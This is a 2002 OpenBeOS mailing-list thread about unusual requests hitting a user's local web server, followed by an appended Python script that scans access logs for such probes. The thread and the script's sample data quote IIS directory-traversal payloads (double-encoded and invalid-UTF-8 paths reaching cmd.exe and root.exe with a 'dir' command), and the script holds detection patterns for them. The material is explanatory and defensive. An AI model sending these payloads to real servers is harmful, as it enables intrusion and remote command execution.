All those commands the hacker sent are scans to see if there is a common (unpatched) NT server at that IP. An NT/2000 server that is unpatched would give the directory of c:\ as a result of any one of those commands.

jtarbox

----- Original Message -----
From: "Daniel Reinhold" <danielr@xxxxxxxxxxxxx>
To: "Public OBOS mailing list" <openbeos@xxxxxxxxxxxxx>
Sent: Tuesday, March 19, 2002 1:48 AM
Subject: [openbeos] I think someone tried to hack into my machine

> Ok, this was rather interesting. It happened just about fifteen minutes
> ago (as I'm writing this).
>
> I'm online (PPP dialup) and am also running a local webserver (i.e.
> sending requests to loopback address 127.0.0.1). Yeah, that's asking
> for trouble, at least theoretically. That is, someone on the internet,
> if they happened to get a hold of my (temporary, dynamically assigned)
> IP, could send requests for local files and have them sent back out
> across the network. I've never had anything weird happen before, so
> I've always been pretty blasé about the security risk.
>
> Anyway, I'm just testing some news items locally before copying them
> over to the OpenBeOS website (which is my usual MO). Suddenly, I notice
> the Terminal window (largely covered by another window, but partially
> showing) has a flurry of text flying by and the DUN replicant in the
> Deskbar shows lots of bytes transmitting back and forth. Wtf? So I
> uncover the Terminal window (which is running the webserver) and see
> that a number of unusual requests have just been attended to. Here's
> the first one:
>
> GET /scripts/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
>
> The remaining requests all look like that but with different URLs. Here
> are the other URLs that were requested:
>
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>
> To me, that looks all the world like some hacker trying to grab files
> from my local machine. Could there be another explanation?
>
> Of course, I'm running BeOS (and don't have NT) so my local webserver
> just returned a bunch of 404 (Not found) responses. Still, makes you
> wonder.
>
> Has anyone else on this list had any similar experiences? What do you
> make of this?
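The requests quoted above share a small set of tell-tale features that a web server log can be screened for: they aim at a command interpreter (cmd.exe, or root.exe, a copy of it), they climb out of the document root with ".." segments, and they hide the path separator behind double percent-encoding (%255c decodes to %5c, which decodes to a backslash) or behind the bytes %c0 and %c1, which are never valid lead bytes in UTF-8 and only "work" against a decoder that tolerates them. The following script is an added example, not part of the mail thread or of any OpenBeOS code; it parses a few constructed Common Log Format lines modelled on the probes in the mail, decodes each path the way a lenient server would, and reports which indicators fired and how many flagged requests came from each source address. The log lines, addresses and timestamps are all made up for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (Common Log Format). The probe paths are
# the ones quoted in the mail; the source addresses and timestamps are invented.
SAMPLE_LOG = """\
10.0.0.7 - - [19/Mar/2002:01:33:02 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
10.0.0.7 - - [19/Mar/2002:01:33:02 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 210
10.0.0.7 - - [19/Mar/2002:01:33:03 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210
10.0.0.7 - - [19/Mar/2002:01:33:03 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210
10.0.0.7 - - [19/Mar/2002:01:33:04 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210
10.0.0.7 - - [19/Mar/2002:01:33:04 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210
192.168.1.5 - - [19/Mar/2002:01:35:10 -0500] "GET /news/index.html HTTP/1.0" 200 4821
192.168.1.5 - - [19/Mar/2002:01:35:11 -0500] "GET /images/logo.gif HTTP/1.0" 200 1180
"""

# Common Log Format: client - user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

SHELL_BINARIES = (b"cmd.exe", b"root.exe")


def normalize_path(raw_path):
    """Decode a request path the way a lenient server might see it.

    Percent-decodes up to twice (so %255c -> %5c -> backslash is caught), works
    on raw bytes so that invalid UTF-8 such as %c1%1c is kept rather than
    replaced, then folds backslashes into forward slashes and lower-cases.
    """
    data = raw_path.encode("latin-1", "replace")
    for _ in range(2):
        decoded = unquote_to_bytes(data)
        if decoded == data:  # nothing left to decode
            break
        data = decoded
    return data.replace(b"\\", b"/").lower()


def classify_request(raw_path):
    """Return the list of indicators a request path triggers (empty = clean)."""
    reasons = []
    lower_raw = raw_path.lower()
    norm = normalize_path(raw_path)
    if any(name in norm for name in SHELL_BINARIES):
        reasons.append("shell-binary")        # asks for a command interpreter
    if b"../" in norm:
        reasons.append("traversal")           # climbs out of the document root
    if "%25" in lower_raw:
        reasons.append("double-encoding")     # '%' itself was percent-encoded
    if re.search(r"%c[01]", lower_raw):
        reasons.append("invalid-utf8")        # 0xC0/0xC1 are never UTF-8 lead bytes
    return reasons


def scan_log(log_text):
    """Parse CLF lines and return one record per flagged request."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a CLF line; skip rather than guess
        reasons = classify_request(match["path"])
        if reasons:
            hits.append({
                "ip": match["ip"],
                "path": match["path"],
                "status": int(match["status"]),
                "reasons": reasons,
            })
    return hits


def summarize(hits):
    """Count flagged requests per source address; a burst from one address
    within a few seconds is the 'flurry' the mail describes."""
    per_ip = {}
    for hit in hits:
        per_ip[hit["ip"]] = per_ip.get(hit["ip"], 0) + 1
    return per_ip


if __name__ == "__main__":
    flagged = scan_log(SAMPLE_LOG)
    for hit in flagged:
        print(f'{hit["ip"]} {hit["status"]} {hit["path"]}  <- {", ".join(hit["reasons"])}')
    print("flagged requests per source:", summarize(flagged))
```

On the sample above the six probe lines are flagged and the two ordinary page fetches are not; every flagged request carries the "shell-binary" indicator, and the three traversal variants additionally show which encoding trick each one used. A server that does not have those binaries (as in the BeOS case) answers 404 and nothing is lost, but the per-address count is still worth alerting on: a 404 storm of this shape from one address is a scan, and the same address will be probing the rest of the network.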